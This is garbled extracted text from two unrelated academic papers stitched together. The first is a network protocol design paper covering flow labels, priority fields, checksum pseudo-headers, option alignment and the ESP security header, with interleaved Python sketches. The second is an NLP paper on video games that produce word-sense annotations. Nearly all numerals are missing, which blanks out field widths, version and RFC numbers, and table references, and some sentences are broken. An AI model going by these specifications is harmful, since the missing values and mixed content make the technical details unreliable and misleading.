this means that the load can be reduced to -bit groups ( minus bytes for ipv headers and bytes for data segment headers) or even smaller if additional extended headers are used. in order to send mtu data packets whose length is longer than the link, such as audio, image and video, long-stream code and absolute return code can be selected. the node can use the data segment header of ipv to identify the data packets in the source node without segmentation and assemble them in the destination node. however, when the sender and the receiver receive the signal disconnected by the return code, they will return to normal working condition. international journal of advanced network, monitoring and controls volume , no. , note: unlike ipv , ipv does not require a "don't fragment" flag in the packet header to perform path mtu discovery, which is an implicit feature of ipv . and the process associated with using mtu in rfc- is not applicable to ipv , because the message of ipv "datagram too big" is always identifies the exact mtu being used. also, the procedures associated with the use of mtu tables in rfc- are not applicable to ipv because the ipv version of the "datagram too big" message always identifies the exact mtu being used. unlike ipv and ipv , ipv can transmit the practical applications such as audio or video, it need to use the ever-flowing code and absolute return code, thus formed in the reserved the actual circuit actually has become a three layer structure, so there is no try to transfer the concept of content as guaranteed delivery channels and reliable safety, guarantee the transmission content don't interrupt. this results in the co-existence of the three - and four-tier architectures within the ipv network. iv. flow label a data flow is a sequence of packets sent from one source to another destination address (point-to-point or multicast), and the source nodes require the intermediate router to have special control over these packets. these special processes can be transferred to routers through control protocols, such as resource reservation protocols, or through the information carried by the packets themselves in the data stream, such as segment options. there may be multiple active streams between a pair of source and destination nodes, as well as many communications independent of any flow. a flow is uniquely identified by a combination of a source address and a non-zero flow label. the flow label field for packets that do not belong to any flow is set to . the flow label is assigned by the source node of the data flow. new flow tags must be randomly selected (pseudo random), ranging from to (decimal). the purpose of the random assignment is to make the bits in the flow label suitable for use as hash keys in routers to find the relevant state of the flow. all packets belonging to the same flow must be sent with the same source node address, destination node address, priority, and flow label. if any of these packets contain a segment option header, they must all have the same segment option header content. if any of their packets contain a routing header, all of their extended headers preceding the routing header must have the same content, including the routing header (except for the header field next to the routing header). allows, but does not require, the router and destination node to check whether the above requirements are met. 
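a minimal sketch of the flow-label bookkeeping described in this section: labels are chosen pseudo-randomly, are non-zero for packets that belong to a flow, and a flow is identified by the pair (source address, flow label). the width of the flow label field is not legible above, so a 20-bit label space is assumed here purely for illustration.

```python
import random

FLOW_LABEL_BITS = 20          # assumed width, for illustration only

class FlowLabelAllocator:
    """hand out pseudo-random, non-zero flow labels per source address,
    avoiding labels the source still considers in use."""

    def __init__(self, seed=None):
        self._rng = random.Random(seed)
        self._in_use = set()   # (source_address, flow_label) pairs

    def new_flow(self, source_address: bytes) -> int:
        while True:
            label = self._rng.randrange(1, 1 << FLOW_LABEL_BITS)  # non-zero
            key = (source_address, label)
            if key not in self._in_use:
                self._in_use.add(key)
                return label

    def release(self, source_address: bytes, label: int) -> None:
        """forget a label once the flow's state lifetime has expired."""
        self._in_use.discard((source_address, label))

alloc = FlowLabelAllocator(seed=42)
src = bytes(32)                      # placeholder source address
label = alloc.new_flow(src)
print(hex(label), label != 0)        # a non-zero pseudo-random flow label
alloc.release(src, label)            # after the flow state lifetime expires
```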
if a violation of these requirements is detected, the node should send an "icmp parameter problem, code " message pointing at the high-order bit of the flow label (that is, at the corresponding offset within the ipv packet). routers are free to set up flow-handling state opportunistically, "on timing", even when no explicit flow-establishment protocol, segment option, or other method has supplied them with flow-creation information. for example, on receiving a packet with an unknown, non-zero flow label from a particular source node, a router may process its ipv header and any required extension headers as though the flow label were zero. flow state that has been set up and cached on timing in this way must be discarded within six seconds, whether or not packets of the same flow continue to arrive. if a packet with the same source address and flow label arrives after the cached state has been discarded, the packet must undergo full normal processing (as if its flow label were zero), which may cause flow state to be re-established and cached again. the lifetime of explicitly established flow state, such as state created by a control protocol or by segment options, must be specified as part of the explicit establishment mechanism and may exceed six seconds. a source node must not reuse a flow label for a new flow while any flow state previously created for that label may still be alive. since flow state created on timing has a lifetime of six seconds, the minimum interval between the last packet of one flow and the first packet of a new flow reusing the same label is six seconds; a flow label whose state has a longer lifetime cannot be reused for new flows during that lifetime. when a node halts and restarts (for example, after a system crash), care must be taken not to reuse a flow label that may have been assigned to an earlier flow whose state has not yet expired. this can be achieved either by recording flow label usage in stable storage, so that labels used before the crash can be recalled afterwards, or by refraining from allocating any flow labels until the maximum possible lifetime of previously created flow state has expired (at least six seconds, and longer if an explicit flow-establishment mechanism with a longer lifetime was in use). if the minimum reboot time of the node is known, that time can be deducted from the waiting period before flow labels are allocated again.
v. category type design
the category type field in the ipv header enables the source node to identify the desired delivery priority of its packets relative to other packets sent from the same node. the category type bits consist of two parts. the high-order bits specify the address length: the value is interpreted as a power of two, giving the address length in bytes, with a defined default. the last five bits specify two ranges of communication categories: the lower range of values gives the priority of congestion-controlled traffic, that is, traffic the source is willing to have delayed in the face of congestion, such as tcp traffic; the upper range gives the priority of traffic that is not to be delayed in the face of congestion, that is, "real-time" packets sent at a fixed rate.
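the category type layout just described can be sketched as follows: the high-order bits select the address length as a power of two in bytes, and the last five bits carry the communication priority. the field is assumed here to be a single octet with three high-order bits; the document's exact widths and default value are elided, so these constants are placeholders.

```python
PRIORITY_BITS = 5          # "the last five bits", as stated in the text
ADDR_LEN_BITS = 3          # placeholder width for the high-order part


def parse_category_type(octet: int):
    # high-order bits select the address length as a power of two (in bytes);
    # the low five bits carry the communication priority
    addr_selector = octet >> PRIORITY_BITS
    priority = octet & ((1 << PRIORITY_BITS) - 1)
    return 1 << addr_selector, priority


print(parse_category_type(0b101_00110))   # -> (32, 6)
```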
for congestion-controlled traffic, the following priority values are recommended for particular application classes, listed from lowest to highest: uncharacterized traffic; filler traffic (e.g., netnews); unattended data transfer (e.g., email); reserved; attended bulk transfer (e.g., ftp, nfs); reserved; interactive traffic (e.g., telnet, x); internet control traffic (e.g., routing protocols, snmp); audio; video; audio or video whose compression is tolerant of alignment errors; broadcast audio and video; emergency use. for non-congestion-controlled traffic, the lowest priority value should be used for packets the sender is most willing to have discarded under congestion (such as high-fidelity video traffic), and the highest value for packets the sender is least willing to have discarded (such as low-fidelity audio traffic). there is no ordering relation between the priorities of non-congestion-controlled traffic and those of congestion-controlled traffic.
vi. upper protocol design
a. upper protocol checksum
if a transport protocol or any other upper-layer protocol includes the addresses from the ip header when calculating its checksum, then, in order to run over ipv , the checksum algorithm must be modified to cover the full-length ipv addresses rather than the shorter addresses of the earlier ip version. the pseudo-header used by tcp and udp over ipv is shown in table xi.
table xi. tcp and udp pseudo-header for ipv
source address | destination address | time | identify code | payload length | next header
1) if the packet contains a routing header, the destination address used in the pseudo-header is that of the final destination: at the source node, this is the last address in the routing header; at the receiver, it is found in the destination address field of the ipv header.
2) the next header value in the pseudo-header identifies the upper-layer protocol (e.g., the values assigned to tcp and udp). if there is an extension header between the ipv header and the upper-layer protocol header, the next header value in the pseudo-header differs from the next header value in the ipv header.
3) the payload length value in the pseudo-header is the length of the upper-layer packet, including the upper-layer protocol header. if there are extension headers between the ipv header and the upper-layer payload, this value is smaller than the ipv payload length (or than the length carried in the large payload option).
4) unlike the earlier ip version, when a udp packet is sent from an ipv node the udp checksum is not optional: whenever an ipv node sends a udp packet it must compute the udp checksum over the packet and the pseudo-header, and if the result is zero it must be converted to hex ffff and placed in the udp header. an ipv receiver must discard a udp packet carrying a zero checksum and log the error.
the checksum of the ipv version of icmp also includes the above pseudo-header in its calculation. this is a change from the earlier version of icmp, which does not include a pseudo-header. the change is made to ensure that icmp is protected against misdelivery or corruption of those ipv header fields on which it depends and which, unlike in the earlier ip version, are not covered by an internet-layer checksum. the next header field in the icmp pseudo-header carries the value assigned to the ipv version of icmp.
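to make the pseudo-header rule concrete, the following is a minimal sketch of an upper-layer checksum computed over the addresses, the payload length and the next header value together with the upper-layer packet, with a computed zero transmitted as hex ffff as stated above. the 16-octet addresses and the exact packing of the length and next-header fields are assumptions modelled on standard ipv6, since the document's own address length and field layout are elided; the function names are illustrative.

```python
import struct


def ones_complement_sum(data: bytes) -> int:
    # sum 16-bit words with end-around carry
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for (word,) in struct.iter_unpack("!H", data):
        total += word
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def upper_layer_checksum(src: bytes, dst: bytes, next_header: int, packet: bytes) -> int:
    # pseudo-header: source address, destination address, upper-layer length,
    # three zero octets, next header (an ipv6-style layout, assumed here)
    pseudo = src + dst + struct.pack("!I3xB", len(packet), next_header)
    csum = (~ones_complement_sum(pseudo + packet)) & 0xFFFF
    return csum if csum else 0xFFFF      # a computed zero is sent as hex ffff


print(hex(upper_layer_checksum(bytes(16), bytes(16), 17, b"hello world!")))
```

b.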
maximum packet lifetime unlike ipv , ipv nodes like ipv do not require a mandatory maximum packet lifetime. this is why the "lifetime" field of ipv has been renamed ipv 's "segment limit". in practice, very fewer ipv complies with the current packet lifetime, so this is not a practical change. any protocol that relies on the internet layer (whether ipv or ipv ) to limit the lifetime of packets should be upgraded to rely on its own mechanism to detect and discard stale packets. c. maximum upper layer load when calculating the maximum load available for upper level protocol, it must be taking into account that the ipv header is larger than the ipv header. for example, in ipv , tcp's mss option is calculated by the maximum datagram length (the default value obtained through path mtu discovery) minus -bit groups ( -bit groups for the minimum length of ipv headers and for the minimum length of tcp headers) from. when using tcp over ipv , the mss must be calculated by the maximum length minus -bit groups, because the minimum ipv header (when international journal of advanced network, monitoring and controls volume , no. , ipv without an extended header) is -bit larger than the minimum ipv header. vii. format of options it is required to design the fields first when designing new options for segment option headers or destination option headers; these are based on the following assumptions. ) any field in the option data of an option that consists of multiple -bit groups should be aligned with their natural boundaries, that is, fields with n -bit groups of width should be placed at integer multiples of n -bit groups from the beginning of the segment header or destination option header, where n= , , , or . ) each segment header or destination option header takes up as little space as possible and must meet the requirement that the header length is an integer multiple of an -bit group. ) it can be assumed that when any header with options appears, they only have a fewer options, usually only one. these assumptions mean that it needs planning the individual fields of an option, arrange the fields from smallest to largest, with no padding in the middle, and then derive the alignment requirements for the entire field based on the alignment requirements for the largest field. examples are given below. case . if option x requires two data fields, one with a length of -bit groups and one with a length of - bit groups, it should be arranged according to table . table xii. two field design table option type =x option data length = four -bit group fields eight -bit group fields its alignment requirement is n+ to ensure that the eight -bit fields start with an -fold offset from the header. the full segment header or destination header with the above options is shown in table . table xiii. full header or destination header format next header length of extension header = option type =x option data length = four -bit group fields eight -bit group fields case . if option y requires three fields, one with a length of four -bit groups, one with a length of two - bit groups, and one -bit group, the format is shown in table . table xiv. three field design format option length=y option data length = one -bit group fields two -bit group fields four -bit group fields its alignment requirement is n+ to ensure that the four -bit leader fields start at a times offset from the header. the full hop-by-hop or destination option header with the above options is shown in table . 
international journal of advanced network, monitoring and controls volume , no. , table xv. a three-field full data format next header length of extension header = pad option = option type =y option data length = one -bit group field two -bit group fields four -bit group fields padn option= option data length = case . the segment header or destination header for each option x and option y in both case and case should be one of the following two formats, depending on which option appears first, as shown in tables and . table xvi. one format of contain both two - and three-field address next header length of extension header = option type=x option data length = four -bit group fields eight -bit group fields padn option = option data length = option type=y option data length = one -bit group fields two -bit group fields one -bit group fields padn option= option data length = table xvii. another format of contain both two - and three-field address next header length of extension header = padn option= option type=y option data length = one -bit group fields two -bit group fields four -bit group fields padn option= option data length = option type =x option data length = four -bit group fields eight -bit group fields viii. encapsulate security payload header design a. format of encapsulate security payload header esp (encapsulating security payload) header is designed to provide mixed security services in ipv . the esp mechanism can be applied with the authentication header or in a nested manner in tunnel mode alone. security services may be provided between a pair of communicating hosts, or between a pair of communicating security gateways, or between a security gateway and a host. the primary difference between the authentication header and the esp mechanism is the effective area service. the encapsulation security payload mechanism does not protect any ip header fields unless they are encapsulated by the esp, such as in tunnel mode where the ip header is encapsulated underneath. the encapsulation security header is inserted after the ip header. in transport mode, the encapsulated security header is in front of the upper layer protocol header, and in tunnel mode, the encapsulated security header is in front of the encapsulated ip header. international journal of advanced network, monitoring and controls volume , no. , esp mechanisms provide services such as confidentiality, data origin authentication, connectionless integrity, anti-replay services (a form of partial sequence integrity), and limited communication confidentiality. the business provided by this mechanism depends on the options and the location of the application when the security association is established. confidentiality can be independent of other business options. however, the use of confidentiality alone without integrity authentication can lead to attacks that compromise the confidentiality of communication. data origin authentication and connectionless integrity are federated services that can be provided as an option along with confidentiality services. the anti-replay service can only be selected if the data origin authentication service is selected, which is entirely up to the receiver. the confidential service requires selection in tunnel mode, and this service is most effective when it used in the security gateway, because the clustering of communication on the gateway may mask the true source and host address modes. 
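stepping back to the option-format cases above, the alignment bookkeeping they illustrate can be sketched as follows: an option with an "xn + y" requirement must start y octets past a multiple of x from the beginning of the header, and the whole extension header is padded out to a multiple of 8 octets. the 8-octet granularity and the pad1/padn encodings are assumptions carried over from standard ipv6, since the document's constants are elided.

```python
def padding_before(offset: int, x: int, y: int) -> int:
    # octets of padding so an option starting at `offset` satisfies "xn + y"
    return (y - offset) % x


def pad_bytes(n: int) -> bytes:
    # pad1 / padn encodings, assumed from standard ipv6
    if n == 0:
        return b""
    if n == 1:
        return b"\x00"
    return bytes([1, n - 2]) + b"\x00" * (n - 2)


def trailer_padding(header_len: int) -> int:
    # padding needed to round the whole extension header to a multiple of 8 octets
    return (-header_len) % 8


# e.g. an option whose largest field needs 8n + 2 alignment, placed right after
# the 2-octet header start, needs no leading padding:
print(padding_before(offset=2, x=8, y=2))   # -> 0
```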
note that while both confidentiality and authentication services are optional, at least one of them should be chosen. a protocol header (ipv header, ipv base header, or extended header) that precedes the esp header will have a value of in its protocol field (if ipv header) or in its next header field (if it is the ipv extended header). the format of esp groups and headers is shown in table . table xviii. format of esp groups and headers security parameters index(spi) sequence number payload data(variable length) fill field( ~ b)) pad length next header authentication data(variable length) note: the scope of the certification business is the part before the certification data (authentication data is not included); the scope of the encryption service provided is the portion of the data that follows the serial number and precedes the authentication data (serial numbers and authentication data are not included). b. description of safe load format the fields in the header format are explained below. the "optional" of the text indicates that if the field is not selected, the field is ignored and is not used when calculating the overall check value. if "required", this field must appear in the esp group. ) security parameters index(spi) it is a required field of bits. this field is associated with the security of the datagram that uniquely identifies the address of the address ip and the security protocol. the value of the spi can be any, currently from to is reserved by iana (). the value of spi is reserved for local, specific application use. ) sequence number it is a bit monotonically increasing counter (serial number). this field is required even if the receiver does not select to enable the playback service for a particular security association. the processing of this sequence number field is entirely done by the receiver, that is, the sender must transmit this field, and the receiver may or may not comply with the field. when a security association is established, both sender and receiver counters are set to . if the anti- replay is started (default is enabled), the serial number international journal of advanced network, monitoring and controls volume , no. , transferred does not allow loops. therefore, after a secure association group, the sender and receiver counters must be reset. ) payload data it is a variable-length field that contains the data described by the next header field. the payload field is required and is an integer multiple of bytes in length. ) fill field this field is used for encryption. the purposes of use fill fields in the esp header are as follows. a) if an encryption algorithm requires the body to be an integer multiple of bytes, the padding bytes are used to the body. (in addition to the filling fields themselves, the payload data, the filling length, and the next header fields are also included) to meet the data length requirements of the encryption algorithm. b) even without considering the requirements of the encryption algorithm, fields need to be filled in to ensure the length of the encrypted data terminates at the boundary of b. in particular, the length of the fill length field and the next header field must be aligned to b. c) apart from above algorithmic and alignment requirements, padding fields may also be used to hide the true length of the payload and partially encrypt the communication. however, this additional padding obviously consumes bandwidth resources and should be used with caution. the sender can add to the b to the fill field. 
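a sketch of the fill-field computation just described: the payload data, the padding, the pad-length octet and the next-header octet together must be a multiple of the cipher's block size, and the trailer must end on a 4-octet boundary. the 4-octet figure and the 1, 2, 3, ... filler bytes are assumptions taken from common esp practice, since the document's values are elided; the per-association sequence counter is assumed to start at zero when the security association is set up.

```python
import math


def esp_pad_length(payload_len: int, block_size: int) -> int:
    # padding before the two trailer octets (pad length + next header)
    unit = math.lcm(block_size, 4)           # cipher block size and 4-octet alignment
    return (-(payload_len + 2)) % unit


def build_esp_trailer(payload: bytes, block_size: int, next_header: int) -> bytes:
    pad_len = esp_pad_length(len(payload), block_size)
    padding = bytes(range(1, pad_len + 1))   # conventional 1, 2, 3, ... filler (assumed)
    return payload + padding + bytes([pad_len, next_header])


class EspSequence:
    # per-security-association counter: the sender always transmits it,
    # the receiver may or may not check it
    def __init__(self):
        self.counter = 0
    def next(self) -> int:
        self.counter += 1
        return self.counter


print(len(build_esp_trailer(b"x" * 10, 16, 6)))   # -> 16
```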
padding is optional in an esp group, but all applications must support the generation and use of padding fields to satisfy the encryption algorithm for the length of the encrypted data while ensuring that the authentication data is aligned to the b boundary. d) pad length this field is required, and the valid fill length value should be from to , with indicating no fill bytes. e) next header this field is required and is an -bit field indicating the data type in the payload data field. f) authentication data it is a variable-length field that contains the group's integrity check value (icv), which is calculated from the esp group except the authentication data. this field is optional and only occurs if the authentication business is included in the security association. the authentication algorithm must account for the full length of the verification value and the relative rules of validation and processing steps. c. processing of security payload header encapsulated security payloads (esp) are used in two ways: transport mode or tunnel mode. ) transmission mode transmission mode applies only to host applications. in this mode, the esp header only protects the upper layer protocol and not the ip header field. in this mode, the esp header is inserted after other ip headers and before the upper layer protocols of tcp, udp, and icmp. in ipv , the esp header is treated as an end-to-end payload, so the header must appear after the hop-to-hop, route, and segment headers. the host option header may appear before or after the esp header, depending on the semantics required. the locations of the esp headers in a typical ipv packet in transport mode are shown in tables and . table xix. datagrams before the application of esp header basic header extension header(if any) tcp data international journal of advanced network, monitoring and controls volume , no. , table xx. datagram after the application of esp header basic header hop-to-hop, destination header route header segment header esp destination options header tcp data esp trailer esp authentication the encrypted portion of the above packet can be a basic header encryption or a host option header, tcp, data, and esp tail. the authenticated part in addition to the above part is encrypted, but also the package security load. ) tunnel mode the esp header in tunnel mode can be used for host or security gateway. tunnel mode must be used when the esp header is applied to the security gateway to protect the user's transmission communication. in tunnel mode, the "lower" ip header carries the final source and destination address, while the "upper" ip headers contain the other addresses, such as the address of a security gateway. in tunnel mode, the esp header is positioned relative to the "upper" ip header as it is in transport mode. the position of the esp header in a typical ipv packet in tunnel mode is shown in table . table xxi. esp headers in typical ipv packets in tunnel mode upper basic header upper extension header (if any) esp lower basic header upper extension header (if any) tcp data esp trailer esp authentication in the above group, the encrypted part can be the upper basic header, the lower basic header, the lower extended header, tcp, data and esp. the authenticated part in addition to the above part is encrypted, but also the esp. ix. conclusion this paper is a specific research and design scheme of rfc and rfc for the future network. the -layer routing address space is described according to the document in rfc . 
ipv has a routing hierarchy of up to layers, and this routing hierarchy is a key feature in its wide application. in order to protect previous investments, ipv and ipv compatible addresses have been set inside, with layers - designed for ipv and ipv compatibility and layer described in the rfc document. the large number of address spaces in ipv also makes it possible to allocate addresses in a direct way in order to the application of ip mobile, iptv, ip phone, internet of things and other network applications that need to use arabic numerals to represent and need to use characters that do not have to be analyzed again, this design also designed a character router. ipv address length is designed according to the document of rfc that the network address length is bits in the future network, and the address space length is designed as bits according to the actual demand, thus solves the address space capacity problem in the next years. in order to meet the technical demand of rfc and rfc , the definitions of routing hierarchy, address length, address working mode, address space international journal of advanced network, monitoring and controls volume , no. , resource, address text representation method, compression definition and separator were redefined, please refer to other related articles of this design team. references [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc. digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . . it’s all fun and games until someone annotates: video games with a purpose for linguistic annotation david jurgens and roberto navigli department of computer science sapienza university of rome {jurgens,navigli}@di.uniroma .it abstract annotated data is prerequisite for many nlp applications. acquiring large-scale annotated corpora is a major bottleneck, requiring sig- nificant time and resources. recent work has proposed turning annotation into a game to increase its appeal and lower its cost; how- ever, current games are largely text-based and closely resemble traditional annotation tasks. we propose a new linguistic annota- tion paradigm that produces annotations from playing graphical video games. the effec- tiveness of this design is demonstrated using two video games: one to create a mapping from wordnet senses to images, and a sec- ond game that performs word sense disam- biguation. 
both games produce accurate re- sults. the first game yields annotation qual- ity equal to that of experts and a cost reduc- tion of % over equivalent crowdsourcing; the second game provides a . % improve- ment in accuracy over current state-of-the-art sense disambiguation games with wordnet. introduction nearly all of natural language processing (nlp) depends on annotated examples, either for train- ing systems or for evaluating their quality. typi- cally, annotations are created by linguistic experts or trained annotators. however, such effort is often very time- and cost-intensive, and as a result cre- ating large-scale annotated datasets remains a long- standing bottleneck for many areas of nlp. as an alternative to requiring expert-based anno- tations, many studies used untrained, online work- ers, commonly known as crowdsourcing. when successful, crowdsourcing enables gathering anno- tations at scale; however, its performance is still lim- ited by ( ) the difficulty of expressing the annota- tion task as a simply-understood task suitable for the layman, ( ) the cost of collecting many anno- tations, and ( ) the tediousness of the task, which can fail to attract workers. therefore, several groups have proposed an alternate annotation method us- ing games: an annotation task is converted into a game which, as a result of game play, produces an- notations (pe-than et al., ; chamberlain et al., ). turning an annotation task into a game with a purpose (gwap) has been shown to lead to better quality results and higher worker engagement (lee et al., ), thanks to the annotators being stimu- lated by the playful component. furthermore, be- cause games may appeal to a different group of peo- ple than crowdsourcing, they provide a complemen- tary channel for attracting new annotators. within nlp, gamified annotation tasks include anaphora resolution (hladká et al., ; poesio et al., ), paraphrasing (chklovski and gil, ), term associations (artignan et al., ) and dis- ambiguation (seemakurty et al., ; venhuizen et al., ). the games’ interfaces typically incorpo- rate common game elements such as scores, leader- boards, or difficulty levels. however, the game it- self remains largely text-based, with a strong resem- blance to a traditional annotation task, and little re- semblance to games most people actively play. in the current work, we propose a radical shift in nlp-focused gwap design, building graphical, dy- namic games that achieve the same result as tradi- tional annotation. rather than embellish an annota- transactions of the association for computational linguistics, ( ) – . action editor: mirella lapata. submitted / ; revised / ; revised / ; published / . c© association for computational linguistics. tion task with game elements, we start from a video game that is playable alone and build the task into the game as a central component. by focusing on the game aspect, players are presented with a more fa- miliar task, which leads to higher engagement. fur- thermore, the video game interface can potentially attract more interest from the large percentage of the populace who play video games. in two video games, we demonstrate how certain linguistic annotation tasks can be effectively repre- sented as video games. the first video game, puz- zle racer, produces a mapping between images and wordnet senses (fellbaum, ), thereby creating a large-scale library of visual analogs of concepts. 
while resources such as imagenet (deng et al., ) provide a partial sense-image mapping, they are limited to only a few thousand concrete noun senses, whereas puzzle racer annotates all parts of speech and both concrete and abstract senses. fur- thermore, puzzle racer’s output enables new visual games for tasks using word senses such as word sense disambiguation, frame detection, and selec- tional preference acquisition. the second game, ka-boom!, performs word sense disambiguation (wsd) to identify the meaning of a word in context by players interacting with pictures. sense annota- tion is regarded to be one of the most challenging nlp annotation tasks (fellbaum et al., ; ed- monds and kilgarriff, ; palmer et al., ; art- stein and poesio, ), so we view it as a challeng- ing application for testing the limits of visual nlp games. our work provides the following four contribu- tions. first, we present a new game-centric design methodology for nlp games with a purpose. sec- ond, we demonstrate with the first game that video games can produce linguistic annotations equal in quality to those of experts and at a cost reduc- tion from gathering the same annotations via crowd- sourcing; with the second game we show that video games provide a statistically significant performance improvement over a current state-of-the-art non- video game with a purpose for sense annotation. third, we release both games as a platform for other researchers to use in building new games and for annotating new data. fourth, we provide multiple resources produced by the games: ( ) an image li- brary mapped to noun, verb, and adjective word- net senses, consisting of , images across senses, ( ) a set of associated word labels for most images, ( ) sense annotations as a distribution over images and senses, and ( ) mappings between word senses and related web queries. related work games with a purpose multiple works have pro- posed linguistic annotation-based games with a pur- pose for tasks such as anaphora resolution (hladká et al., ; poesio et al., ), paraphrasing (chklovski and gil, ), term associations (artig- nan et al., ; lafourcade and joubert, ; van- nella et al., ), acquiring common sense knowl- edge (kuo et al., ; herdağdelen and baroni, ), and wsd (chklovski and mihalcea, ; seemakurty et al., ; venhuizen et al., ). notably, all of these linguistic games have play- ers primarily interacting with text, in contrast to other highly successful games with a purpose such as foldit (cooper et al., ), in which players fold protein sequences, and the esp game (von ahn and dabbish, ), where players label images with words. most similar to our games are wordrobe (ven- huizen et al., ) and jinx (seemakurty et al., ), which perform wsd, and the knowledge towers (vannella et al., ), which associates im- ages with senses. wordrobe asks players to disam- biguate nouns and verbs using multiple choice ques- tions where options are sense definitions and disam- biguation is limited to terms with at most five senses, a limitation that does not exist in our games. jinx uses two players who both have to independently provide lexical substitutes of an ambiguous word and are then scored on the basis of their shared sub- stitutes. while jinx has a more game-like feel, pro- ducing annotations from the substitutes is non-trivial and requires looking for locality of the substitutes in the wordnet graph. 
in contrast to wordrobe and jinx, we provide a game-centric design methodology for the seamless integration of the annotation task into a video game with dynamic, graphical elements. the knowledge towers (tkt) is a video game for validating the associations between images and word senses in babelnet (navigli and ponzetto, ) and associating each of the senses with new images acquired from a web query of one of the sense’s lemmas. to perform the annotation, players are shown a word and its definition and then asked to retrieve pictures matching that definition during game play. in contrast, our puzzle racer game is purely vi- sual and does not require players to read defini- tions, instead showing picture examples, increas- ing its video game-like quality. furthermore, puz- zle racer is tested on nouns, verbs, and adjectives whereas tkt is only applicable to annotate nouns since it relies on the babelnet knowledge base to acquire its initial set of image-sense associations, which contains images only for nouns. image libraries associating images with con- ceptual entities is a long-standing goal in com- puter vision (barnard et al., ) and two ap- proaches have built large-scale image libraries based on the wordnet hypernym ontology. the data set of torralba et al. ( ) contains over m im- ages across all , non-abstract wordnet noun synsets. however, to support the size of the data set, images are down-scaled to x pixels; fur- thermore, their image-sense mapping error rates vary between - % with more general concepts having higher error rates. the second significant image library comes from imagenet (deng et al., ), which contains . m high-resolution images for , non-abstract wordnet noun synsets. no- tably, both libraries focus only on concrete nouns. in contrast, the present work provides a methodol- ogy for generating image-sense associations for all parts of speech and for both abstract and concrete concepts. within nlp resources, babelnet (navigli and ponzetto, ) merges wikipedia and word- net sense inventories and contains mappings from wordnet senses to the pictures present on the cor- responding wikipedia page. however, since images come from an encyclopedia, the associations are in- herently limited to only nouns and, due to inherently partial mapping, only . % of the wordnet senses have images, with an average of . images for those senses. the present work also varies from pre- vious approaches in that image-sense pairs are rated according to the strength of association between the image and sense, rather than having a binary un- graded association. crowdsourced wsd many nlp areas have ap- plied crowdsourcing (wang et al., ); of these areas, the most related to this work is crowdsourc- ing word sense annotations. despite initial success in performing wsd using crowdsourcing (snow et al., ), many approaches noted the difficulty of performing wsd with untrained annotators, espe- cially as the degree of polysemy increases or when word senses are related. several approaches have attempted to make the task more suitable for un- trained annotators by ( ) using the crowd itself to define the sense inventory (biemann and nygaard, ), thereby ensuring the crowd understands the sense distinctions, ( ) modifying the questions to explicitly model annotator uncertainty (hong and baker, ; jurgens, ), or ( ) using sophis- ticated methods to aggregate multiple annotations (passonneau et al., ; passonneau and carpen- ter, ). in all cases, annotation was purely text based, in contrast to our work. 
game : puzzle racer the first game was designed to fill an important need for enabling engaging nlp games: image repre- sentations of concepts, specifically wordnet senses. our goals are two-fold: ( ) to overcome the limits of current sense-image libraries, which have focused largely on concrete nouns and ( ) to provide a gen- eral game platform for annotation tasks that need to associate lexical items with images. following, we first describe the design, annotation process, and ex- tensibility of the game, and then discuss how its in- put data is generated. a live demonstration of the game is available online. . design and game play puzzle racer was designed to be as “video game- like” as possible, with no mentioning of linguistic terminology. because the game is targeted for the layperson, we view this a fundamental design ob- jective to make the game more engaging and long- lasting. therefore, puzzle racer is modeled after popular games such as temple run and subway surfers, but with the twist of combining two game genres: racing and puzzle solving. racing provides the core of game play, while the annotation is em- bedded as puzzle solving during and after the race. http://www.knowledgeforge.org following, we describe the game play and then de- tail how playing produces annotations. racing to race, players navigate a race car along a linear track filled with obstacles and enemy pieces. during play, players collect coins, which can be used to obtain non-annotation achievements and to increase their score. enemies were added to intro- duce variety into the game and increase the strategy required to keep playing. players begin the race with – health points, depending on the racer chosen, which are decreased when touching enemies. dur- ing game play, players may collect power-ups with familiar actions such as restoring lost health, dou- bling their speed, or acting as a magnet to collect coins. to bring a sense of familiarity, the game was designed using a combination of sprites, sound ef- fects, and music from super mario world, mario kart , and custom assets created by us. races initially last for seconds, but may last longer if players collect specific power-ups that add time. puzzle solving prior to racing, players are shown three images, described as “puzzle clues,” and in- structions asking them to find the common theme in the three pictures (fig. a). then, during rac- ing, players encounter obstacles, referred to as puz- zle gates, that show a series of images. to stay alive, players must navigate their racer through the one picture in the series with the same theme as the puzzle clues. players activate a gate after touching one of its images; a gate may only be activated once and racer movement over other pictures has no ef- fect. puzzle gates appear at random intervals during game play. two types of gate appear. in the first, the gate shows pictures where one picture is known to be re- lated to the puzzle clues. we refer to these as golden gates. racing over an unrelated image in a golden gate causes the player to lose one health point, which causes the race to end if their health reaches zero. the second type of gate, referred to as a mystery gate, shows three images that are potentially related to the clue. moving over an image in a mystery gate has no effect on health. prior to activating a gate, there is no visual difference between the two gates. figure b shows a racer approaching a puzzle gate. 
